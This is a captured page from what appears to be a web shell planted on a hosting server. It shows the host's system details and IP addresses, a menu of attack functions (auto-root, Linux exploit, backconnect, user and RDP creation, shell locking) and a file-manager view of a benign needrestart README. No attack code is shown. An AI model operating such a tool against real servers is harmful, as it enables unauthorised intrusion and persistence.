Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.80.111
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
needrestart /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
NEWS.Debian.gz
295
B
-rw-r--r--
NEWS.gz
1.22
KB
-rw-r--r--
README.Cont.md
1.16
KB
-rw-r--r--
README.Interp.md
2.4
KB
-rw-r--r--
README.batch.md
928
B
-rw-r--r--
README.md
3.03
KB
-rw-r--r--
README.nagios.md
785
B
-rw-r--r--
README.raspberry.md
687
B
-rw-r--r--
README.uCode.md
966
B
-rw-r--r--
changelog.Debian.gz
1.5
KB
-rw-r--r--
copyright
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.raspberry.md
needrestart - Raspberry Pi ========================== Raspbian and other linux distros are installing multiple kernel images in parallel: - `kernel.img` - `kernel7.img` - `kernel7l.img` - `kernel8.img` This might result in a continuous pending kernel update false positive. There is a configuration option in needrestart to filter the kernel image filenames to ignore the unused image files. To filter the kernel image on a RPi 2 or RPi 3: ```shell $ cat << EOF > /etc/needrestart/conf.d/kernel.conf # Filter kernel image filenames by regex. This is required on Raspian having # multiple kernel image variants installed in parallel. $nrconf{kernelfilter} = qr(kernel7\.img); EOF ```
Close